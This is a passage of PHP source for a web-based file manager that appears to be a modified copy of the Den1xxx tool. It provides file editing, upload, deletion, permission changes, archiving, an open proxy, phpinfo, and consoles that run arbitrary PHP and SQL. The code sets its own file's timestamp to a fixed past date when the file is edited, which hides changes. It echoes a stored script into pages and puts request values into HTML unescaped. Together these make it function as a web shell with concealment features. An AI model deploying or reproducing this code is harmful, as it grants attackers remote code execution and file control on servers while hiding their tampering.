	            $file_detects=base64_decode($_GET['download']);
                            
	            fm_download($file_detects);	            
                           
}


// Just show info

if (isset($_GET['phpinfo'])) {
	            phpinfo(); 

	            die();
}


// Mini proxy, many bugs!

if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) {
                          
	            $url = isset($_GET['url'])?urldecode($_GET['url']):'';

	            $proxy_form = '

<div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);">

	            <form action="" method="GET">
	            <input type="hidden" name="proxy" value="true">
                         
	            '.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55">
                            
	            <input type="submit" value="'.__('Show').'" class="fm_input">

	            </form>
                            
</div>

';

	            if ($url) {
                          
	            	            $ch = curl_init($url);
	            	            curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy');

	            	            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                        
	            	            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
	            	            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);

	            	            curl_setopt($ch, CURLOPT_HEADER, 0);
                        
	            	            curl_setopt($ch, CURLOPT_REFERER, $url);
                          
	            	            curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
	            	            $result = curl_exec($ch);

	            	            curl_close($ch);

	            	            //$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result);
                           
	            	            $result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result);

	            	            $result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result);
	            	            echo $result;

	            	            die();
                        
	            } 

}

?>

<!doctype html>

<html>

<head>     
	            <meta charset="utf-8" />

	            <meta name="viewport" content="width=device-width, initial-scale=1" />
                            
    <title><?=__('File manager')?></title>
<style>

body {

	            background-color:	            white;

	            font-family:	            	            Verdana, Arial, Helvetica, sans-serif;
                          
	            font-size:	            	            	            8pt;
	            margin:	            	            	            	            0px;

}

                           
a:link, a:active, a:visited { color: #006699; text-decoration: none; }

a:hover { color: #DD6900; text-decoration: underline; }
a.th:link { color: #FFA34F; text-decoration: none; }
a.th:active { color: #FFA34F; text-decoration: none; }
a.th:visited { color: #FFA34F; text-decoration: none; }
                            
a.th:hover {  color: #FFA34F; text-decoration: underline; }


table.bg {
	            background-color: #ACBBC6

}
                            


th, td { 

	            font:	            normal 8pt Verdana, Arial, Helvetica, sans-serif;

	            padding: 3px;
}



th	            {

	            height:	            	            	            	            25px;
                           
	            background-color:	            #006699;

	            color:	            	            	            	            #FFA34F;

	            font-weight:	            	            bold;

	            font-size:	            	            	            11px;
}


                           
.row1 {

	            background-color:	            #EFEFEF;
                         
}



.row2 {

	            background-color:	            #DEE3E7;

}



.row3 {
	            background-color:	            #D1D7DC;
	            padding: 5px;
}

                         
tr.row1:hover {

	            background-color:	            #F3FCFC;

}
                          


tr.row2:hover {
	            background-color:	            #F0F6F6;

}
                        


.whole {

	            width: 100%;
                          
}


.all tbody td:first-child{width:100%;}
                        


textarea {

	            font: 9pt 'Courier New', courier;
                         
	            line-height: 125%;

	            padding: 5px;

}
                            

.textarea_input {
	            height: 1em;
}
                         


.textarea_input:focus {

	            height: auto;

}
                           


input[type=submit]{

	            background: #FCFCFC none !important;
	            cursor: pointer;
                          
}


                         
.folder {

    background-image: url("");
}
                           

                         
.file {
    background-image: url("");
}
                         
<?=fm_home_style()?>

.img {

	            background-image: 

url("");
                            
}
                            
@media screen and (max-width:720px){
  table{display:block;}

    #fm_table td{display:inline;float:left;}

    #fm_table tbody td:first-child{width:100%;padding:0;}
    #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;}
    #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;}
    #fm_table tr{display:block;float:left;clear:left;width:100%;}
	            #header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;}
                           
	            #header_table table td {display:inline;float:left;}
                           
}

</style>
                         
</head>

<body>

<?php
$url_inc = '?fm=true';
                        
if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){

	            $res = empty($_POST['sql']) ? '' : $_POST['sql'];
                        
	            $res_lng = 'sql';
} elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){
                            
	            $res = empty($_POST['php']) ? '' : $_POST['php'];

	            $res_lng = 'php';
                         
} 
if (isset($_GET['fm_settings'])) {
	            echo ' 
                          
<table class="whole">

<form method="post" action="">
<tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr>
                         
'.(empty($msg_configs)?'':'<tr><td class="row2" colspan="2">'.$msg_configs.'</td></tr>').'
                          
'.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').'

'.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').'
                            
'.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').'

'.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').'

'.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').'
'.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').'

'.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').'

'.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').'

'.fm_config_checkbox_row(__('Show').' xls','show_xls').'
'.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').'

'.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').'
                         
<tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr>
<tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr>
<tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr>

<tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr>

'.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').'

'.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').'

'.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').'
                        
'.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').'
'.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').'
<tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr>

</form>
                           
</table>
                          
<table>
                           
<form method="post" action="">
                            
<tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr>

<tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth_cookies['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr>
                        
<tr><td class="row1"><input name="fm_login[login]" value="'.$auth_cookies['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr>
<tr><td class="row1"><input name="fm_login[password]" value="'.$auth_cookies['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr>
                        
<tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth_cookies['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr>
<tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth_cookies['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr>

<tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth_cookies['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr>

<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr>

</form>

</table>';
echo fm_tpl_form('php'),fm_tpl_form('sql');
                           
} elseif (isset($proxy_form)) {

	            die($proxy_form);
                          
} elseif (isset($res_lng)) {	            

?>
                         
<table class="whole">
<tr>

    <th><?=__('File manager').' - '.$path?></th>
                        
</tr>

<tr>
    <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php

	            if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php');

	            else echo '</h2></td><td>'.fm_run_input('sql');

	            ?></td></tr></table></td>
</tr>

<tr>
                           
    <td class="row1">

	            	            <a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a>

	            	            <form action="" method="POST" name="console">
	            	            <textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/>
                           
	            	            <input type="reset" value="<?=__('Reset')?>">
                           
	            	            <input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run">

<?php
                           
$str_tmpl = $res_lng.'_templates';

$tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : '';
                        
if (!empty($tmpl)){
	            $active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : '';
	            $select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n";
	            $select .= '<option value="-1">' . __('Select') . "</option>\n";

	            foreach ($tmpl as $key=>$value){

	            	            $select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n";

	            }
                         
	            $select .= "</select>\n";

	            echo $select;

}

?>

	            	            </form>
	            </td>

</tr>
                         
</table>
<?php
                           
	            if (!empty($res)) {

	            	            $fun='fm_'.$res_lng;

	            	            echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>';
	            }

} elseif (!empty($_REQUEST['edit'])){

	            if(!empty($_REQUEST['save'])) {

	            	            $fn = $path . $_REQUEST['edit'];

	            	            $filemtime = filemtime($fn);

	                if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg_configs .= __('File updated');

	            	            else $msg_configs .= __('Error occurred');
                           
	            	            if ($_GET['edit']==basename(__FILE__)) {
	            	            	            touch(__FILE__,1415116371);
                        
	            	            } else {

	            	            	            if (!empty($fm_config['restore_time'])) touch($fn,$filemtime);
                         
	            	            }
	            }

    $oldcontent = @file_get_contents($path . $_REQUEST['edit']);

    $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path;
                          
    $backlink = $url_inc . '&path=' . $path;
?>
<table border='0' cellspacing='0' cellpadding='1' width="100%">

<tr>

    <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th>
                         
</tr>
<tr>
                          
    <td class="row1">
        <?=$msg_configs?>
	            </td>

</tr>
                            
<tr>

    <td class="row1">
                        
        <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a>

	            </td>

</tr>

<tr>
    <td class="row1" align="center">
                         
        <form name="form1" method="post" action="<?=$editlink?>">

            <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea>

            <input type="submit" name="save" value="<?=__('Submit')?>">

            <input type="submit" name="cancel" value="<?=__('Cancel')?>">

        </form>

    </td>

</tr>
</table>
<?php
                         
echo $auth_cookies['script'];
} elseif(!empty($_REQUEST['rights'])){
                          
	            if(!empty($_REQUEST['save'])) {
	                if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively']))
	            	            $msg_configs .= (__('File updated')); 

	            	            else $msg_configs .= (__('Error occurred'));

	            }

	            clearstatcache();
                        
    $oldrights = fm_rights_string($path . $_REQUEST['rights'], true);

    $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path;
                          
    $backlink = $url_inc . '&path=' . $path;
?>

<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>

</tr>

<tr>
                        
    <td class="row1">

        <?=$msg_configs?>
                            
	            </td>
                        
</tr>
<tr>
    <td class="row1">
        <a href="<?=$backlink?>"><?=__('Back')?></a>
                        
	            </td>

</tr>

<tr>

    <td class="row1" align="center">
                         
        <form name="form1" method="post" action="<?=$link?>">

           <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>">
        <?php if (is_dir($path.$_REQUEST['rights'])) { ?>

            <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/>

        <?php } ?>

            <input type="submit" name="save" value="<?=__('Submit')?>">

        </form>

    </td>

</tr>

</table>
                           
<?php

} elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') {

	            if(!empty($_REQUEST['save'])) {
                          
	                rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']);

	            	            $msg_configs .= (__('File updated'));

	            	            $_REQUEST['rename'] = $_REQUEST['newname'];

	            }

	            clearstatcache();

    $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path;

    $backlink = $url_inc . '&path=' . $path;



?>
                            
<table class="whole">
<tr>
                           
    <th><?=__('File manager').' - '.$path?></th>
                        
</tr>

<tr>

    <td class="row1">
        <?=$msg_configs?>

	            </td>

</tr>
                            
<tr>

    <td class="row1">
                          
        <a href="<?=$backlink?>"><?=__('Back')?></a>
	            </td>
</tr>
<tr>

    <td class="row1" align="center">
                           
        <form name="form1" method="post" action="<?=$link?>">
                        
            <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/>

            <input type="submit" name="save" value="<?=__('Submit')?>">

        </form>
                        
    </td>

</tr>
                            
</table>

<?php

} else {

//Let's rock!

    $msg_configs = '';
    if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) {

        if(!empty($_FILES['upload']['name'])){
                         
            $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']);

            if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){

                $msg_configs .= __('Error occurred');

            } else {

	            	            	            	            $msg_configs .= __('Files uploaded').': '.$_FILES['upload']['name'];
                        
	            	            	            }
                          
        }

    } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') {

        if(!fm_del_ki_arquivos(($path . $_REQUEST['delete']), true)) {

            $msg_configs .= __('Error occurred');

        } else {

	            	            	            $msg_configs .= __('Deleted').' '.$_REQUEST['delete'];

	            	            }
	            } elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) {
                            
        if(!@mkdir($path . $_REQUEST['dirname'],0777)) {
                        
            $msg_configs .= __('Error occurred');

        } else {

	            	            	            $msg_configs .= __('Created').' '.$_REQUEST['dirname'];

	            	            }

    } elseif(!empty($_POST['search_recursive'])) {

	            	            ini_set('max_execution_time', '0');

	            	            $search_data =  find_text_in_ki_arquivos($_POST['path'], $_POST['mask'], $_POST['search_recursive']);
                          
	            	            if(!empty($search_data)) {

	            	            	            $msg_configs .= __('Found in ki_arquivos').' ('.count($search_data).'):<br>';

	            	            	            foreach ($search_data as $filename) {

	            	            	            	            $msg_configs .= '<a href="'.fm_url(true).'?fm=true&edit='.basename($filename).'&path='.str_replace('/'.basename($filename),'/',$filename).'" title="' . __('Edit') . '">'.basename($filename).'</a>&nbsp; &nbsp;';

	            	            	            }

	            	            } else {
                         
	            	            	            $msg_configs .= __('Nothing founded');

	            	            }	            

	            } elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) {
                          
        if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) {

            $msg_configs .= __('Error occurred');

        } else {
                           
	            	            	            fclose($fp);

	            	            	            $msg_configs .= __('Created').' '.$_REQUEST['filename'];
	            	            }

    } elseif (isset($_GET['zip'])) {
	            	            $source = base64_decode($_GET['zip']);
                        
	            	            $destination = basename($source).'.zip';

	            	            set_time_limit(0);
                           
	            	            $phar = new PharData($destination);

	            	            $phar->buildFromDirectory($source);
	            	            if (is_file($destination))

	            	            $msg_configs .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

	            	            '.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination)
                            
	            	            .'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>';
	            	            else $msg_configs .= __('Error occurred').': '.__('no ki_arquivos');

	            } elseif (isset($_GET['gz'])) {
                         
	            	            $source = base64_decode($_GET['gz']);

	            	            $archive = $source.'.tar';
	            	            $destination = basename($source).'.tar';
                          
	            	            if (is_file($archive)) unlink($archive);

	            	            if (is_file($archive.'.gz')) unlink($archive.'.gz');

	            	            clearstatcache();
	            	            set_time_limit(0);
                           
	            	            //die();

	            	            $phar = new PharData($destination);

	            	            $phar->buildFromDirectory($source);
	            	            $phar->compress(Phar::GZ,'.tar.gz');
                           
	            	            unset($phar);

	            	            if (is_file($archive)) {

	            	            	            if (is_file($archive.'.gz')) {

	            	            	            	            unlink($archive); 

	            	            	            	            $destination .= '.gz';

	            	            	            }
                          

                          
	            	            	            $msg_configs .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

	            	            	            '.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination)

	            	            	            .'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';

	            	            } else $msg_configs .= __('Error occurred').': '.__('no ki_arquivos');
	            } elseif (isset($_GET['decompress'])) {

	            	            // $source = base64_decode($_GET['decompress']);

	            	            // $destination = basename($source);
	            	            // $ext = end(explode(".", $destination));
                            
	            	            // if ($ext=='zip' OR $ext=='gz') {

	            	            	            // $phar = new PharData($source);
                          
	            	            	            // $phar->decompress();

	            	            	            // $base_file = str_replace('.'.$ext,'',$destination);
                         
	            	            	            // $ext = end(explode(".", $base_file));
	            	            	            // if ($ext=='tar'){
	            	            	            	            // $phar = new PharData($base_file);
                          
	            	            	            	            // $phar->extractTo(dir($source));

	            	            	            // }

	            	            // } 

	            	            // $msg_configs .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done');

	            } elseif (isset($_GET['gzfile'])) {
	            	            $source = base64_decode($_GET['gzfile']);

	            	            $archive = $source.'.tar';
                            
	            	            $destination = basename($source).'.tar';

	            	            if (is_file($archive)) unlink($archive);

	            	            if (is_file($archive.'.gz')) unlink($archive.'.gz');

	            	            set_time_limit(0);

	            	            //echo $destination;
                        
	            	            $ext_arr = explode('.',basename($source));
                          
	            	            if (isset($ext_arr[1])) {

	            	            	            unset($ext_arr[0]);

	            	            	            $ext=implode('.',$ext_arr);

	            	            } 

	            	            $phar = new PharData($destination);

	            	            $phar->addFile($source);

	            	            $phar->compress(Phar::GZ,$ext.'.tar.gz');

	            	            unset($phar);

	            	            if (is_file($archive)) {

	            	            	            if (is_file($archive.'.gz')) {

	            	            	            	            unlink($archive); 

	            	            	            	            $destination .= '.gz';
	            	            	            }

	            	            	            $msg_configs .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

	            	            	            '.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination)

	            	            	            .'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';

	            	            } else $msg_configs .= __('Error occurred').': '.__('no ki_arquivos');

	            }

?>
                            
<table class="whole" id="header_table" >

<tr>
                            
    <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th>
</tr>

<?php if(!empty($msg_configs)){ ?>

<tr>
                        
	            <td colspan="2" class="row2"><?=$msg_configs?></td>
</tr>

<?php } ?>
<tr>

    <td class="row2">
                           
	            	            <table>

	            	            	            <tr>
                         
	            	            	            <td>

	            	            	            	            <?=fm_home()?>

	            	            	            </td>
	            	            	            <td>
	            	            	            <?php if(!empty($fm_config['make_directory'])) { ?>

	            	            	            	            <form method="post" action="<?=$url_inc?>">
	            	            	            	            <input type="hidden" name="path" value="<?=$path?>" />

	            	            	            	            <input type="text" name="dirname" size="15">

	            	            	            	            <input type="submit" name="mkdir" value="<?=__('Make directory')?>">
                           
	            	            	            	            </form>
                         
	            	            	            <?php } ?>

	            	            	            </td>

	            	            	            <td>

	            	            	            <?php if(!empty($fm_config['new_file'])) { ?>
	            	            	            	            <form method="post" action="<?=$url_inc?>">

	            	            	            	            <input type="hidden" name="path"     value="<?=$path?>" />

	            	            	            	            <input type="text"   name="filename" size="15">

	            	            	            	            <input type="submit" name="mkfile"   value="<?=__('New file')?>">

	            	            	            	            </form>

	            	            	            <?php } ?>

	            	            	            </td>
	            	            	            <td>
	            	            	            	            <form  method="post" action="<?=$url_inc?>" style="display:inline">
                         
	            	            	            	            <input type="hidden" name="path" value="<?=$path?>" />
                            
	            	            	            	            <input type="text" placeholder="<?=__('Recursive search')?>" name="search_recursive" value="<?=!empty($_POST['search_recursive'])?$_POST['search_recursive']:''?>" size="15">

	            	            	            	            <input type="text" name="mask" placeholder="<?=__('Mask')?>" value="<?=!empty($_POST['mask'])?$_POST['mask']:'*.*'?>" size="5">

	            	            	            	            <input type="submit" name="search" value="<?=__('Search')?>">

	            	            	            	            </form>

	            	            	            </td>
                           
	            	            	            <td>

	            	            	            <?=fm_run_input('php')?>

	            	            	            </td>
	            	            	            <td>

	            	            	            <?=fm_run_input('sql')?>
                          
	            	            	            </td>
                        
	            	            	            </tr>
                          
	            	            </table>

    </td>

    <td class="row3">
	            	            <table>
	            	            <tr>
	            	            <td>
	            	            <?php if (!empty($fm_config['upload_file'])) { ?>

	            	            	            <form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data">
                            
	            	            	            <input type="hidden" name="path" value="<?=$path?>" />

	            	            	            <input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" />

	            	            	            <input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" />

	            	            	            <input type="submit" name="test" value="<?=__('Upload')?>" />
	            	            	            </form>
	            	            <?php } ?>
	            	            </td>

	            	            <td>
                           
	            	            <?php if ($auth_cookies['authorize']) { ?>

	            	            	            <form action="" method="post">&nbsp;&nbsp;&nbsp;
                            
	            	            	            <input name="quit" type="hidden" value="1">

	            	            	            <?=__('Hello')?>, <?=$auth_cookies['login']?>

	            	            	            <input type="submit" value="<?=__('Quit')?>">

	            	            	            </form>

	            	            <?php } ?>
	            	            </td>

	            	            <td>
                            
	            	            <?=fm_lang_form($language)?>
	            	            </td>

	            	            <tr>

	            	            </table>

    </td>

</tr>

</table>

<table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%">

<thead>
                          
<tr> 
                         
    <th style="white-space:nowrap"> <?=__('Filename')?> </th>
                        
    <th style="white-space:nowrap"> <?=__('Size')?> </th>
    <th style="white-space:nowrap"> <?=__('Date')?> </th>

    <th style="white-space:nowrap"> <?=__('Rights')?> </th>

    <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th>
                         
</tr>

</thead>
                           
<tbody>
                            
<?php

$elements = fm_scan_dir($path, '', 'all', true);
                           
$dirs = array();
$ki_arquivos = array();
foreach ($elements as $file_detects){

    if(@is_dir($path . $file_detects)){

        $dirs[] = $file_detects;
    } else {
                           
        $ki_arquivos[] = $file_detects;
    }

}

natsort($dirs); natsort($ki_arquivos);

$elements = array_merge($dirs, $ki_arquivos);


foreach ($elements as $file_detects){

    $filename = $path . $file_detects;
    $filedata = @stat($filename);

    if(@is_dir($filename)){

	            	            $filedata[7] = '';

	            	            if (!empty($fm_config['show_dir_size'])&&!fm_root($file_detects)) $filedata[7] = fm_dir_size($filename);
                          
        $link = '<a href="'.$url_inc.'&path='.$path.$file_detects.'" title="'.__('Show').' '.$file_detects.'"><span class="folder">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file_detects.'</a>';

        $loadlink= (fm_root($file_detects)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').'&nbsp;zip',__('Archiving').' '. $file_detects);

	            	            $arlink  = (fm_root($file_detects)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '.$file_detects);
        $style = 'row2';

	            	             if (!fm_root($file_detects)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file_detects. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file_detects . '&path=' . $path  . '\'"'; else $alert = '';
    } else {
                        
	            	            $link = 

	            	            	            $fm_config['show_img']&&@getimagesize($filename) 

	            	            	            ? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\''

	            	            	            . fm_img_link($filename)
                        
	            	            	            .'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file_detects.'</a>'
	            	            	            : '<a href="' . $url_inc . '&edit=' . $file_detects . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file_detects.'</a>';

	            	            $e_arr = explode(".", $file_detects);
	            	            $ext = end($e_arr);
                        
        $loadlink =  fm_link('download',$filename,__('Download'),__('Download').' '. $file_detects);
	            	            $arlink = in_array($ext,array('zip','gz','tar')) 
                        
	            	            ? ''

	            	            : ((fm_root($file_detects)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '. $file_detects));

        $style = 'row1';

	            	            $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file_detects. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file_detects . '&path=' . $path  . '\'"';
    }
                          
    $deletelink = fm_root($file_detects) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file_detects . '" ' . $alert . '>' . __('Delete') . '</a>';

    $renamelink = fm_root($file_detects) ? '' : '<a href="' . $url_inc . '&rename=' . $file_detects . '&path=' . $path . '" title="' . __('Rename') .' '. $file_detects . '">' . __('Rename') . '</a>';
    $rightstext = ($file_detects=='.' || $file_detects=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file_detects . '&path=' . $path . '" title="' . __('Rights') .' '. $file_detects . '">' . @fm_rights_string($filename) . '</a>';

?>

<tr class="<?=$style?>"> 
                        
    <td><?=$link?></td>
                          
    <td><?=$filedata[7]?></td>
                            
    <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td>
    <td><?=$rightstext?></td>

    <td><?=$deletelink?></td>

    <td><?=$renamelink?></td>
                         
    <td><?=$loadlink?></td>
    <td><?=$arlink?></td>

</tr>

<?php
    }

}
?>

</tbody>
</table>
<div class="row3"><?php

	            $mtime = explode(' ', microtime()); 

	            $totaltime = $mtime[0] + $mtime[1] - $starttime; 

	            echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/Den1xxx/Filemanager">Github</a>  | <a href="'.fm_site_url().'">.</a>';

	            if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion();
                            
	            if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file();

	            if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2);

	            if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>';
	            if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>';
                         
	            if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>';

	            if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>';
	            ?>
</div>

<script type="text/javascript">

function download_xls(filename, text) {

	            var element = document.createElement('a');

	            element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text);

	            element.setAttribute('download', filename);
	            element.style.display = 'none';

	            document.body.appendChild(element);

	            element.click();

	            document.body.removeChild(element);

}
                         

                        
function base64_encode(m) {

	            for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) {
	            	            c = m.charCodeAt(l);

	            	            if (128 > c) d = 1;
                         
	            	            else
	            	            	            for (d = 2; c >= 2 << 5 * d;) ++d;
                        
	            	            for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f])
                        
	            }

	            b && (g += k[f << 6 - b]);

	            return g

}



var tableToExcelData = (function() {

    var uri = 'data:application/vnd.ms-excel;base64,',
